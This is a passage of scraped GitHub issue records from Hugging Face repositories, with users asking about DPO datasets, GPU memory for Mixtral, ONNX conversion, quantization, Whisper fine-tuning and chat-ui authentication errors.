multi-turn dialogue dataset for DPO?", "body": "The single-turn dialogue dataset looks like this:\r\ndpo_dataset_dict = {\r\n \"prompt\": [\r\n \"hello\",\r\n \"how are you\",\r\n \"What is your name?\",\r\n \"What is your name?\",\r\n \"Which is the best programming language?\",\r\n \"Which is the best programming language?\",\r\n \"Which is the best programming language?\",\r\n ],\r\n \"chosen\": [\r\n \"hi nice to meet you\",\r\n \"I am fine\",\r\n \"My name is Mary\",\r\n \"My name is Mary\",\r\n \"Python\",\r\n \"Python\",\r\n \"Java\",\r\n ],\r\n \"rejected\": [\r\n \"leave me alone\",\r\n \"I am not fine\",\r\n \"Whats it to you?\",\r\n \"I dont have a name\",\r\n \"Javascript\",\r\n \"C++\",\r\n \"C++\",\r\n ],\r\n}\r\n\r\nSo, how do I prepare a multi-turn dialogue dataset? Can you provide an example? Thank you!", "url": "https://github.com/huggingface/trl/issues/1115", "state": "closed", "labels": [ "\ud83c\udfcb DPO" ], "created_at": "2023-12-20T09:14:45Z", "updated_at": "2024-10-03T14:12:48Z", "user": "chloefresh" }, { "repo": "huggingface/transformers", "number": 28155, "title": "What is the minimum GPU memory required to run the Mixtral-8x7B model?", "body": "I mean the model that just came out: mistralai/Mixtral-8x7B-Instruct-v0.1. It looks like a lot of parameter files; what is the minimum NVIDIA graphics card video memory required?", "url": "https://github.com/huggingface/transformers/issues/28155", "state": "closed", "labels": [], "created_at": "2023-12-20T01:54:45Z", "updated_at": "2024-01-28T08:04:44Z", "user": "zysNLP" }, { "repo": "huggingface/dataset-viewer", "number": 2218, "title": "JobManagerCrashedError jobs are never retried", "body": "Currently, we have 7768 jobs with error_code `JobManagerCrashedError`. 
Some of them are caused by zombie killer set crashes.\r\n\r\n```\r\nAtlas atlas-x5jgb3-shard-0 [primary] datasets_server_cache> db.cachedResponsesBlue.aggregate([{$match:{error_code:\"JobManagerCrashedError\",\"details.copied_from_artifact\":{$exists:false}}},{$group:{_id:{kind:\"$kind\"},count:{$sum:1}}},{$sort:{count:-1}}])\r\n[\r\n { _id: { kind: 'split-duckdb-index' }, count: 3658 },\r\n { _id: { kind: 'split-descriptive-statistics' }, count: 1872 },\r\n { _id: { kind: 'config-parquet-and-info' }, count: 1765 },\r\n { _id: { kind: 'split-first-rows-from-streaming' }, count: 322 },\r\n { _id: { kind: 'split-first-rows-from-parquet' }, count: 72 },\r\n { _id: { kind: 'split-opt-in-out-urls-scan' }, count: 60 },\r\n { _id: { kind: 'dataset-config-names' }, count: 21 }\r\n]\r\n\r\n```\r\n\r\nBut most of them are set as crashed when deploying and are never retried, even if they are fast and straightforward to process.\r\nShould we retry those jobs in backfill? I think we should differentiate the ones that are easy to process against those that are difficult (primarily because of OOMs), maybe retry once or twice, and set a different error so that we can identify which of them are caused by limited resources.\r\n \r\n", "url": "https://github.com/huggingface/dataset-viewer/issues/2218", "state": "closed", "labels": [ "question" ], "created_at": "2023-12-19T15:22:30Z", "updated_at": "2024-01-09T20:32:58Z", "user": "AndreaFrancis" }, { "repo": "huggingface/optimum", "number": 1608, "title": "XENOVA conversion issues", "body": "### System Info\r\n\r\n```shell\r\nusing the requirements.txt in Xenova for environment. \r\n\r\nhttps://github.com/xenova/transformers.js/blob/main/scripts/requirements.txt\r\n```\r\n\r\n\r\n### Who can help?\r\n\r\n@xenova \r\n\r\n### Information\r\n\r\n- [ ] The official example scripts\r\n- [ ] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [ ] My own task or dataset (give details below)\r\n\r\n### Reproduction (minimal, reproducible, runnable)\r\n\r\n\"Error while initializing BPE: Token `_` out of vocabulary\"\r\n\r\n### Expected behavior\r\n\r\nBeen trying to run blenderbot90, 400, 1b distilled.\r\n\r\nHave had lots of issues, but I'll start with this one.\r\n\r\n\r\nversion 1 attempt, and loading from local after git-large file from HF repo.\r\n\r\n tokenizer = AutoTokenizer.from_pretrained(model)\r\n model = ORTModelForSeq2SeqLM.from_pretrained(model)\r\n inputs = tokenizer(\"what is a black hole\", return_tensors=\"pt\")\r\n gen_tokens = model.generate(**inputs)\r\n response = tokenizer.batch_decode(gen_tokens)\r\n\r\n\r\nversion 2 attempt, directly repo using pipeline\r\n\r\n from transformers import AutoTokenizer, pipeline\r\n from optimum.onnxruntime import ORTModelForSeq2SeqLM\r\n tokenizer = AutoTokenizer.from_pretrained(\"Xenova/blenderbot_small-90M\")\r\n model = ORTModelForSeq2SeqLM.from_pretrained(\"Xenova/blenderbot_small-90M\")\r\n onnx_pipe = pipeline(\"conversational\", model=model, tokenizer=tokenizer)\r\n text = \"what is a black hole\"\r\n response = onnx_pipe (text)\r\n \r\n \r\nBoth cases getting this error: \"Error while initializing BPE: Token `_` out of vocabulary\"", "url": "https://github.com/huggingface/optimum/issues/1608", "state": "closed", "labels": [ "bug" ], "created_at": "2023-12-19T02:11:58Z", "updated_at": "2023-12-19T04:54:00Z", "comments": 3, "user": "gidzr" }, { "repo": "huggingface/safetensors", "number": 409, "title": "Doesn't work 
with versions of torch where \"meta\" dtype is not supported.", "body": "### System Info\n\nThis is on my Mac, where I was just testing the interface. It seems like this could easily be fixed.\r\n```\r\n...\r\n>>> from safetensors.torch import save_file\r\n>>> x\r\n{'a': tensor([1., 1., 1., 1., 1., 1., 1., 1., 1., 1.])}\r\n>>> x['a'].device\r\ndevice(type='cpu')\r\n>>> save_file(x, filename='foo')\r\nTraceback (most recent call last):\r\n File \"\", line 1, in \r\n File \"/usr/local/lib/python3.9/site-packages/safetensors/torch.py\", line 281, in save_file\r\n serialize_file(_flatten(tensors), filename, metadata=metadata)\r\n File \"/usr/local/lib/python3.9/site-packages/safetensors/torch.py\", line 460, in _flatten\r\n shared_pointers = _find_shared_tensors(tensors)\r\n File \"/usr/local/lib/python3.9/site-packages/safetensors/torch.py\", line 72, in _find_shared_tensors\r\n if v.device != torch.device(\"meta\") and storage_ptr(v) != 0 and storage_size(v) != 0:\r\nRuntimeError: Expected one of cpu, cuda, xpu, mkldnn, opengl, opencl, ideep, hip, msnpu, xla, vulkan device type at start of device string: meta\r\n>>> safetensors.__version__\r\n'0.4.1'\r\n>>> torch.__version__\r\n'1.8.1'\r\n```\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Reproduction\n\nInstall torch 1.8.1 and safetensors 0.4.1 (this is the current safetensors version in the pip default channel)\r\nRun the code above (sorry, I have not reduced this to a script, but it's the most minimal example of using safetensors)\n\n### Expected behavior\n\nsave_file should work with older versions of torch, like 1.8.1", "url": "https://github.com/huggingface/safetensors/issues/409", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-12-18T15:51:28Z", "updated_at": "2024-01-23T01:49:25Z", "user": "danpovey" }, { "repo": "huggingface/candle", "number": 1457, "title": "How to manually quantize a phi-2 model, starting from safetensors files", "body": "Hi\r\n\r\nI have fine-tuned a phi-2 model using LoRA.\r\n\r\nI merged the adapter with the base model to get a trained one.\r\n\r\nI now have a bunch of safetensors files.\r\n\r\nHow is it possible to convert these files into a gguf file (the llama.cpp converter does not support phi)?\r\n\r\nIn other words, how is it possible to achieve the same as model-v2-q4k.gguf in lmz/candle-quantized-phi?\r\n\r\n\r\n", "url": "https://github.com/huggingface/candle/issues/1457", "state": "closed", "labels": [], "created_at": "2023-12-18T15:14:37Z", "updated_at": "2023-12-18T15:58:12Z", "user": "ghost" }, { "repo": "huggingface/optimum", "number": 1605, "title": "Static Quantization - Token classification", "body": "Hi, \r\nI am following the code [here](https://github.com/huggingface/optimum/tree/main/examples/onnxruntime/quantization/token-classification) for doing static quantization on my token classification model.\r\n\r\nThe inference time for the statically quantized model is almost the same as the non-quantized one. I have tried dynamic quantization too, and it shows some improvement in latency, but I need more.\r\n\r\nDo I have to do anything additional to improve the inference time beyond what is mentioned [here](https://github.com/huggingface/optimum/tree/main/examples/onnxruntime/quantization/token-classification) for static quantization?
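For reference, a minimal sketch of what the dynamic-quantization path looks like in optimum (the directory names are hypothetical, and the AVX512-VNNI target is an assumption about the deployment CPU; static quantization additionally needs a calibration dataset):

```python
# Hedged sketch: dynamic INT8 quantization of an already-exported ONNX model.
# "my-token-clf-onnx" is a hypothetical directory containing model.onnx.
from optimum.onnxruntime import ORTQuantizer
from optimum.onnxruntime.configuration import AutoQuantizationConfig

quantizer = ORTQuantizer.from_pretrained("my-token-clf-onnx")
# is_static=False selects dynamic quantization, which needs no calibration data
qconfig = AutoQuantizationConfig.avx512_vnni(is_static=False, per_channel=False)
quantizer.quantize(save_dir="my-token-clf-onnx-int8", quantization_config=qconfig)
```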
Can anyone please help me?", "url": "https://github.com/huggingface/optimum/issues/1605", "state": "open", "labels": [ "quantization" ], "created_at": "2023-12-18T13:31:33Z", "updated_at": "2024-10-09T09:21:22Z", "comments": 0, "user": "akshay-babbar" }, { "repo": "huggingface/diffusers", "number": 6211, "title": "[Examples] When will you support training scripts for text-to-video in diffusers?", "body": "I want to train SVD in diffusers; can you support this feature in examples?\r\nThanks for your contributions.", "url": "https://github.com/huggingface/diffusers/issues/6211", "state": "closed", "labels": [ "stale" ], "created_at": "2023-12-18T08:26:57Z", "updated_at": "2024-01-26T15:05:32Z", "user": "jiaxiangc" }, { "repo": "huggingface/optimum", "number": 1604, "title": "Table Transformer to ONNX", "body": "### Feature request\n\nHi all,\r\nI am trying to convert the pretrained Table Transformer model from transformers to ONNX. The error reads something like \"'table-transformer' is not a supported format\".\r\n\r\nIs there any way to convert table-transformer (TATR) to an ONNX model? Any help would be cherished.\r\nThanks. \n\n### Motivation\n\nThe motivation for this is that I am working on developing a lightweight table structure recognition model, and an ONNX model would help me in that regard.\n\n### Your contribution\n\nNone", "url": "https://github.com/huggingface/optimum/issues/1604", "state": "closed", "labels": [ "feature-request", "onnx" ], "created_at": "2023-12-18T07:18:21Z", "updated_at": "2024-02-28T08:52:49Z", "comments": 3, "user": "balajiChundi" }, { "repo": "huggingface/safetensors", "number": 407, "title": "Does safetensors save the model's hierarchical structure? Is it similar to ONNX?", "body": "If safetensors saves the model's hierarchical structure, how can one access this structure? Is it possible to read it directly like with ONNX? Can I directly load a model from safetensors? \r\nIf the hierarchical structure of the model is not preserved, does it mean that the original model must be read from config.json?", "url": "https://github.com/huggingface/safetensors/issues/407", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-12-17T15:04:55Z", "updated_at": "2024-02-24T01:45:09Z", "comments": 3, "user": "ZDragonX" }, { "repo": "huggingface/datasets", "number": 6507, "title": "where is glue_metric.py?", "body": " > @Frankie123421 what was the resolution to this?\r\n\r\nuse glue_metric.py instead of glue.py in load_metric\r\n\r\n_Originally posted by @Frankie123421 in https://github.com/huggingface/datasets/issues/2117#issuecomment-905093763_\r\n ", "url": "https://github.com/huggingface/datasets/issues/6507", "state": "closed", "labels": [], "created_at": "2023-12-17T09:58:25Z", "updated_at": "2023-12-18T11:42:49Z", "user": "Mcccccc1024" }, { "repo": "huggingface/peft", "number": 1278, "title": "How to add trainable parameters? 
(bugs in 'modules_to_save')", "body": "### System Info\n\nHi,\r\n\r\nHow can I train other weights in the model rather than fix them during lora training?\r\n\r\n\n\n### Who can help?\n\n@BenjaminBossan Hi, I find you are active recently so I @ you here..\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n```\r\nself.model, self.peft_optimizer, _, self.peft_lr_scheduler = deepspeed.initialize(\r\n config=training_args.deepspeed,\r\n model=model,\r\n model_parameters=optimizers['model_parameters'] if self.training_args.do_train else None,\r\n optimizer=hf_optimizer,\r\n lr_scheduler=hf_lr_scheduler\r\n )\r\n```\r\nI add the parameters I want to train in `hf_optimizer`, but those parameters still do not change\n\n### Expected behavior\n\nthe gradient of those parameters added to `hf_optimizer` should not be None", "url": "https://github.com/huggingface/peft/issues/1278", "state": "closed", "labels": [], "created_at": "2023-12-17T05:34:09Z", "updated_at": "2024-01-29T15:03:39Z", "user": "shawnricecake" }, { "repo": "huggingface/accelerate", "number": 2262, "title": "When I trained with two processes the gradient of the parameters could not be shared and I ended up with two different models. How to solve this problem?", "body": "When I trained with two processes the gradient of the parameters could not be shared and I ended up with two different models. Did anyone meet this problem before? How to solve it?", "url": "https://github.com/huggingface/accelerate/issues/2262", "state": "closed", "labels": [], "created_at": "2023-12-15T13:48:34Z", "updated_at": "2024-06-11T12:26:07Z", "user": "zypsjtu" }, { "repo": "huggingface/datasets", "number": 6501, "title": " OverflowError: value too large to convert to int32_t ", "body": "### Describe the bug\n\n![image](https://github.com/huggingface/datasets/assets/47747764/f58044fb-ddda-48b6-ba68-7bbfef781630)\r\n\n\n### Steps to reproduce the bug\n\njust loading datasets \n\n### Expected behavior\n\nhow can I fix it\n\n### Environment info\n\npip install /mnt/cluster/zhangfan/study_info/LLaMA-Factory/peft-0.6.0-py3-none-any.whl\r\npip install huggingface_hub-0.19.4-py3-none-any.whl tokenizers-0.15.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl transformers-4.36.1-py3-none-any.whl pyarrow_hotfix-0.6-py3-none-any.whl datasets-2.15.0-py3-none-any.whl tyro-0.5.18-py3-none-any.whl trl-0.7.4-py3-none-any.whl\r\n\r\ndone", "url": "https://github.com/huggingface/datasets/issues/6501", "state": "open", "labels": [], "created_at": "2023-12-15T10:10:21Z", "updated_at": "2025-06-27T04:27:14Z", "comments": 1, "user": "zhangfan-algo" }, { "repo": "huggingface/diffusers", "number": 6178, "title": "How to train Stable Diffusion with DDPM?", "body": "I want to train Stable Diffusion with DDPM, but I can't find the code in this project. I found a lot of training code elsewhere on the internet, but most of it is distillation code on pre-trained models, not the original DDPM training code. I also tried to implement the original training code myself, but I couldn't get good results. 
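For reference, the standard DDPM objective is just noise-prediction MSE; a minimal, self-contained sketch with diffusers primitives (unconditional case, with random tensors standing in for a real batch; Stable Diffusion applies the same objective in latent space with a text-conditioned UNet):

```python
# Minimal DDPM training step (sketch): add noise at a random timestep,
# predict that noise with the UNet, and regress with MSE.
import torch
import torch.nn.functional as F
from diffusers import DDPMScheduler, UNet2DModel

model = UNet2DModel(sample_size=64, in_channels=3, out_channels=3)
scheduler = DDPMScheduler(num_train_timesteps=1000)
optimizer = torch.optim.AdamW(model.parameters(), lr=1e-4)

clean_images = torch.randn(4, 3, 64, 64)  # stand-in for a real image batch in [-1, 1]
noise = torch.randn_like(clean_images)
timesteps = torch.randint(0, scheduler.config.num_train_timesteps, (clean_images.shape[0],))

noisy_images = scheduler.add_noise(clean_images, noise, timesteps)
noise_pred = model(noisy_images, timesteps).sample
loss = F.mse_loss(noise_pred, noise)

loss.backward()
optimizer.step()
optimizer.zero_grad()
```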
Could you provide me with the code for this part if it's convenient for you?\r\n", "url": "https://github.com/huggingface/diffusers/issues/6178", "state": "closed", "labels": [], "created_at": "2023-12-15T02:43:07Z", "updated_at": "2023-12-15T02:54:06Z", "user": "MenSanYan" }, { "repo": "huggingface/dataset-viewer", "number": 2208, "title": "Add a collection with datasets infos", "body": "While working on enabling private datasets (#39) under conditions (isPro, isEnterprise), I thought we missed a place where we control the access to the dataset.\r\n\r\nI think the first step in the DAG, instead of dataset-config-names, should be more about the dataset characteristics: if it's private or public, maybe if it's gated (not sure if it's useful info), if the user is pro or if the org is enterprise, if the viewer is disabled through the README (see https://github.com/huggingface/datasets-server/issues/2207), if the dataset is in the block list.\r\n\r\nAll that information could go to a new step called `dataset-status` or something similar.\r\n\r\nThe content could be:\r\n\r\n```json\r\n{\r\n \"dataset\": \"namespace/dataset\",\r\n \"private\": true,\r\n \"proUser\": false,\r\n \"enterpriseOrg\": true,\r\n \"disabledFromReadme\": false,\r\n \"gated\": false,\r\n \"blocked\": false,\r\n}\r\n```\r\n\r\nAnd a second step, called `dataset-enabled`, that would depend on `dataset-status`, and would return:\r\n- 200 `{enabled: true}` if all the conditions are met\r\n- 404 if we don't want to disclose the existence of the dataset, or if it does not exist\r\n- 501 if it's not implemented\r\n- 403? 404? if the dataset viewer is not enabled (private dataset, no pro user/enterprise org)\r\n\r\nThen, the following steps would propagate the error if so, or if 200, will act as currently.\r\n\r\nI think it's clearer to have two different steps: one to collect the data, another one to take a decision on this basis. We could also have everything in one cache entry, but I think the logic for maintenance would be harder (we would have to add info like: is that dataset private, is the user pro, etc. in the error details, or in the content, etc. to be able to check them regularly)", "url": "https://github.com/huggingface/dataset-viewer/issues/2208", "state": "closed", "labels": [ "question", "refactoring / architecture", "P2" ], "created_at": "2023-12-14T13:59:42Z", "updated_at": "2024-01-11T14:30:03Z", "user": "severo" }, { "repo": "huggingface/dataset-viewer", "number": 2207, "title": "Backfill job processes datasets with disabled viewer?", "body": "If I read the code correctly, the backfill cronjob does not check if the dataset viewer is disabled (`viewer: false` in the README).\r\n\r\nIf we want to implement the dataset viewer for private datasets, under conditions (isPro, isEnterprise), we will have to check these conditions before adding jobs.", "url": "https://github.com/huggingface/dataset-viewer/issues/2207", "state": "closed", "labels": [ "bug", "question", "P2" ], "created_at": "2023-12-14T13:01:53Z", "updated_at": "2024-02-06T16:03:10Z", "user": "severo" }, { "repo": "huggingface/huggingface_hub", "number": 1907, "title": "How to fix \"VBox(children=(HTML(value='
corresponding English translation text]. Hence the Amharic alphabets are unseen in Whisper training. \r\nThe dataset I am trying to fine-tune with is [Amharic audio -> corresponding text in Amharic characters]. It consists of 92.28 hours (32901 instances) for training and 9.12 hours (3139 instances) for the testing set. \r\nMy data sources are: \r\n1. https://github.com/getalp/ALFFA_PUBLIC/tree/master/ASR/AMHARIC and \r\n2. https://www.findke.ovgu.de/findke/en/Research/Data+Sets/Amharic+Speech+Corpus.html\r\n\r\nI tried the tiny, base, and small model sizes. In my first run with whisper-small, I observed a bad performance but when tried to play around with some parameters, including the model size, I was unable to run the code even.\r\nI am not quite sure how to introduce the Amharic language characters other than giving the corresponding text as I have seen in the Hindi example.\r\nI would appreciate your comment regarding the language whose characters were not seen in the Whisper training because it was treated as a speech translation only.\r\nThank you!", "url": "https://github.com/huggingface/blog/issues/1702", "state": "open", "labels": [], "created_at": "2023-12-13T02:47:31Z", "updated_at": "2024-10-02T02:16:12Z", "user": "mequanent" }, { "repo": "huggingface/chat-ui", "number": 629, "title": "Unable to use Azure AD for OpenID signin", "body": "Azure AD does not return the `picture` claim for the `profile` scope which results in a Zod validation error and authentication failing with `HTTP 500`:\r\n\r\n```\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | ZodError: [\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | {\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | \"code\": \"invalid_type\",\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | \"expected\": \"string\",\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | \"received\": \"undefined\",\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | \"path\": [\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | \"picture\"\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | ],\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | \"message\": \"Required\"\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | }\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | ]\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | at get error [as error] (file:///app/node_modules/zod/lib/index.mjs:538:31)\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | at ZodEffects.parse (file:///app/node_modules/zod/lib/index.mjs:638:22)\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | at updateUser (file:///app/build/server/chunks/7-74fde01e.js:34:6)\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | at load (file:///app/build/server/chunks/7-74fde01e.js:126:9)\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | at async load_server_data (file:///app/build/server/index.js:1932:18)\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | at async file:///app/build/server/index.js:3303:18 {\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | issues: [\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | {\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | code: 'invalid_type',\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | expected: 'string',\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | received: 'undefined',\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | path: [Array],\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | message: 'Required'\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | }\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | ],\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | addIssue: [Function (anonymous)],\r\nchat-ui-chat-ui-1 | 
21:07:21 28|index | addIssues: [Function (anonymous)],\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | errors: [\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | {\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | code: 'invalid_type',\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | expected: 'string',\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | received: 'undefined',\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | path: [Array],\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | message: 'Required'\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | }\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | ]\r\nchat-ui-chat-ui-1 | 21:07:21 28|index | }\r\n```", "url": "https://github.com/huggingface/chat-ui/issues/629", "state": "closed", "labels": [ "support" ], "created_at": "2023-12-12T21:22:19Z", "updated_at": "2024-02-19T09:39:51Z", "comments": 8, "user": "zacps" }, { "repo": "huggingface/chat-ui", "number": 628, "title": "isModelsModalOpen is not defined in ChatIntroduction.svelte probably after recent update ?", "body": "Hi getting this error after updating to the latest version :\r\n\r\nAm Running :\r\n{\r\n 'chat-ui': '0.6.0',\r\n npm: '10.2.4',\r\n node: '21.3.0',\r\n acorn: '8.11.2',\r\n ada: '2.7.4',\r\n ares: '1.20.1',\r\n base64: '0.5.1',\r\n brotli: '1.0.9',\r\n cjs_module_lexer: '1.2.2',\r\n cldr: '44.0',\r\n icu: '74.1',\r\n llhttp: '9.1.3',\r\n modules: '120',\r\n napi: '9',\r\n nghttp2: '1.58.0',\r\n nghttp3: '0.7.0',\r\n ngtcp2: '0.8.1',\r\n openssl: '3.0.12+quic',\r\n simdutf: '4.0.4',\r\n tz: '2023c',\r\n undici: '5.27.2',\r\n unicode: '15.1',\r\n uv: '1.46.0',\r\n uvwasi: '0.0.19',\r\n v8: '11.8.172.17-node.17',\r\n zlib: '1.2.13.1-motley-5daffc7'\r\n}\r\n```\r\n\r\n> chat-ui@0.6.0 dev\r\n> vite dev\r\n\r\n\r\n\r\n VITE v4.3.9 ready in 1206 ms\r\n\r\n \u279c Local: http://localhost:5173/\r\n \u279c Network: use --host to expose\r\n(node:1526125) [DEP0040] DeprecationWarning: The `punycode` module is deprecated. 
Please use a userland alternative instead.\r\n(Use `node --trace-deprecation ...` to show where the warning was created)\r\n12:13:23 AM [vite-plugin-svelte] /home/user/public_html/chatui3/src/lib/components/chat/ChatIntroduction.svelte:53:7 'isModelsModalOpen' is not defined\r\n12:13:23 AM [vite-plugin-svelte] /home/user/public_html/chatui3/src/lib/components/chat/ChatIntroduction.svelte:54:53 'isModelsModalOpen' is not defined\r\n12:13:23 AM [vite-plugin-svelte] /home/user/public_html/chatui3/src/lib/components/chat/ChatIntroduction.svelte:64:22 'isModelsModalOpen' is not defined\r\nReferenceError: isModelsModalOpen is not defined\r\n at /home/user/public_html/chatui3/src/lib/components/chat/ChatIntroduction.svelte:61:8\r\n at Object.$$render (/home/user/public_html/chatui3/node_modules/svelte/src/runtime/internal/ssr.js:156:16)\r\n at eval (/home/user/public_html/chatui3/src/lib/components/chat/ChatMessages.svelte:75:99)\r\n at Object.$$render (/home/user/public_html/chatui3/node_modules/svelte/src/runtime/internal/ssr.js:156:16)\r\n at eval (/home/user/public_html/chatui3/src/lib/components/chat/ChatWindow.svelte:116:102)\r\n at Object.$$render (/home/user/public_html/chatui3/node_modules/svelte/src/runtime/internal/ssr.js:156:16)\r\n at /home/user/public_html/chatui3/src/routes/+page.svelte:57:25\r\n at Object.$$render (/home/user/public_html/chatui3/node_modules/svelte/src/runtime/internal/ssr.js:156:16)\r\n at Object.default (/home/user/public_html/chatui3/.svelte-kit/generated/root.svelte:50:42)\r\n at eval (/home/user/public_html/chatui3/src/routes/+layout.svelte:203:39)\r\n```", "url": "https://github.com/huggingface/chat-ui/issues/628", "state": "closed", "labels": [ "support" ], "created_at": "2023-12-12T18:49:31Z", "updated_at": "2023-12-24T07:40:42Z", "comments": 7, "user": "DrShivang" }, { "repo": "huggingface/autotrain-advanced", "number": 389, "title": "How to disable default used --multi_gpu ?", "body": " File \"/app/env/lib/python3.10/site-packages/accelerate/commands/launch.py\", line 822, in _validate_launch_command\r\n raise ValueError(\"You need to use at least 2 processes to use `--multi_gpu`.\")\r\nValueError: You need to use at least 2 processes to use `--multi_gpu`.\r\n\r\nHow to disable this from the default provided params ? \r\n\r\nCan autotrain be used with the free CPU version ?\r\n\r\nthank you", "url": "https://github.com/huggingface/autotrain-advanced/issues/389", "state": "closed", "labels": [], "created_at": "2023-12-12T13:32:03Z", "updated_at": "2023-12-15T09:21:52Z", "user": "FiveTechSoft" }, { "repo": "huggingface/chat-ui", "number": 627, "title": "Rlhf data collection feature ", "body": "Is it possible to add a way to generate multiple drafts for a given input. 
And then, based on what the user picks, save that data so that it can be used for RLHF?", "url": "https://github.com/huggingface/chat-ui/issues/627", "state": "open", "labels": [ "enhancement", "front", "back" ], "created_at": "2023-12-12T13:29:06Z", "updated_at": "2023-12-14T08:53:14Z", "comments": 0, "user": "nivibilla" }, { "repo": "huggingface/transformers", "number": 27974, "title": "how to replace an existing token in a tokenizer", "body": "### Feature request\r\n\r\nI have a tokenizer which has lots of reserved tokens like below:\r\n```\r\n '': 100,\r\n '': 101,\r\n '': 102,\r\n '': 103,\r\n '': 104,\r\n '': 105,\r\n '': 106,\r\n '': 107,\r\n```\r\nI want to replace the '' with '<|im_start|>' and replace '' with '<|im_end|>'\r\n\r\nWhat I want to get is a tokenizer which can act as below:\r\ntokenizer.encode('<|im_start|>') => 100\r\n\r\n\r\n### Motivation\r\n\r\nI want to replace the '' with '<|im_start|>' and replace '' with '<|im_end|>'\r\n\r\n\r\n### Your contribution\r\n\r\nno", "url": "https://github.com/huggingface/transformers/issues/27974", "state": "closed", "labels": [], "created_at": "2023-12-12T12:59:53Z", "updated_at": "2025-05-05T19:18:29Z", "user": "muziyongshixin" }, { "repo": "huggingface/chat-ui", "number": 623, "title": "ChatUI with Docker - Permissions Issue", "body": "I'm trying to use the ChatUI space with Docker. I have a private, custom model which I've trained. \r\nI want to access it in a private space using Docker ChatUI.\r\nI seem to be running into permissions errors. \r\n\r\nThings I've tried:\r\nFollowing the instructions set out here: https://huggingface.co/blog/Llama2-for-non-engineers (I used Llama2 with a custom dataset)\r\nCreating it with / without the MongoDB URI\r\nAdding an existing secret as the HF_TOKEN\r\nCreating a new \"HUGGING_FACE_HUB_TOKEN\" in my settings and in the new space and using that\r\nAdding the new token as a secret in the space where the model was generated\r\nHardcoding the access token in .env.local.template to see if it gives a temp fix (it didn't)\r\nDoes it matter if I don't have a centralised secret that is explicitly named as \"HF_TOKEN\"?\r\n\r\nError:\r\nhuggingface_hub.utils._errors.RepositoryNotFoundError: 401 Client Error. (Request ID: Root=1-6576f9fe-00986ef531649f933739e793;0d286b3c-5e65-45c1-a1f9-7efea56654dd)\r\n\r\nError: DownloadError\r\nRepository Not Found for url: https://huggingface.co/api/models//.\r\nPlease make sure you specified the correct repo_id and repo_type.\r\nIf you are trying to access a private or gated repo, make sure you are authenticated.\r\nInvalid username or password.\r\n\r\n\r\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r\n 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r\ncurl: (7) Failed to connect to 127.0.0.1 port 8080: Connection refused\r\nWarning: Transient problem: connection refused Will retry in 10 seconds. 
59 \r\nWarning: retries left.", "url": "https://github.com/huggingface/chat-ui/issues/623", "state": "open", "labels": [ "support" ], "created_at": "2023-12-12T08:10:31Z", "updated_at": "2023-12-28T13:58:22Z", "comments": 1, "user": "aidansys17" }, { "repo": "huggingface/text-generation-inference", "number": 1332, "title": "How can I set log output to local file", "body": "### Feature request\n\nI want to set the TGI log to file instead of stdout.\n\n### Motivation\n\nI want to set the TGI log to file instead of stdout.\n\n### Your contribution\n\nhow can I use params in command of env variables to set log output to file.", "url": "https://github.com/huggingface/text-generation-inference/issues/1332", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-12-12T07:54:26Z", "updated_at": "2024-01-18T01:46:56Z", "user": "soulseen" }, { "repo": "huggingface/alignment-handbook", "number": 74, "title": "A question about the SFTTrainer (also a theoretical question about SFT in general)", "body": "I have a general question about Supervised Fine Tuning (SFT) for Dialogue applications.\r\n\r\nShould the SFT process use the same LM objective (next-token prediction) that is used in pre-training a language model?\r\n\r\nThe \"Dialogue\" task is predicting \"assistant\" tokens, right? Shouldn't the objective be predicting only those tokens? Is one way to do this is to set labels for only assistant tokens and ignore the labels on others?\r\n\r\nThe SFTTrainer [implementation](https://github.com/huggingface/trl/blob/main/trl/trainer/sft_trainer.py#L381) does not set labels - as far as I understand, this leads to \"labels\" being cloned to \"input_ids\" and shifted right (within transformers code) leading to using \"next-token\" prediction objective.\r\n\r\nMore on a philosophical note - if using the same objective as pre-training for SFT, why 